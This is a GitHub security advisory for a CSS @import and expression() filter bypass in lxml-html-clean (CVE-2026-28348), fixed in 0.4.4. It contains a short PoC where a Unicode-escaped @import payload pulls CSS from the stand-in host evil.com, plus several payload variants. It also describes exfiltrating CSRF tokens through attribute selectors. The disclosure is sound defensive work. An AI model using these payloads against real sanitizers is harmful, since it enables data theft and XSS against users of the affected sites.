Skip to content

lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes

Moderate severity GitHub Reviewed Published Mar 2, 2026 in fedora-python/lxml_html_clean • Updated Mar 5, 2026

Package

pip lxml-html-clean (pip)

Affected versions

<= 0.4.3

Patched versions

0.4.4

Description

Summary

The _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This causes CSS Unicode escape sequences to bypass the @import and expression() filters, allowing external CSS loading or XSS in older browsers.

Details

The root cause is located in clean.py (around line 594):

style = style.replace('\\', '')

This transformation changes a payload like @\69mport into @69mport. This resulting string does NOT match the blacklist keyword @import. However, all modern browsers' CSS parsers decode \69 as the character 'i' (hex 69) according to CSS spec section 4.3.7, interpreting @\69mport as a valid @import statement.

Same root cause bypasses expression() detection: \65xpression(alert(1)) passes through (IE only).

PoC

from lxml_html_clean import clean_html

# Normal @import is correctly blocked:
# clean_html('<style>@import url("http://evil.com/x.css");</style>')
# Output: <div><style> url("http://evil.com/x.css");</style></div>

# Unicode escape bypass:
result = clean_html('<style>@\\69mport url("http://evil.com/x.css");</style>')
print(result)
# Output: <div><style>@\69mport url("http://evil.com/x.css");</style></div>

If rendered in a browser, the browser loads the external CSS. Variants like @\0069mport, @\69 mport (trailing space), and @\49mport (uppercase I) also work.

Impact

External CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via expression().

References

Published to the GitHub Advisory Database Mar 2, 2026
Reviewed Mar 2, 2026
Published by the National Vulnerability Database Mar 5, 2026
Last updated Mar 5, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(9th percentile)

Weaknesses

Improper Encoding or Escaping of Output

The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved. Learn more on MITRE.

CVE ID

CVE-2026-28348

GHSA ID

GHSA-hw26-mmpg-fqfg

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.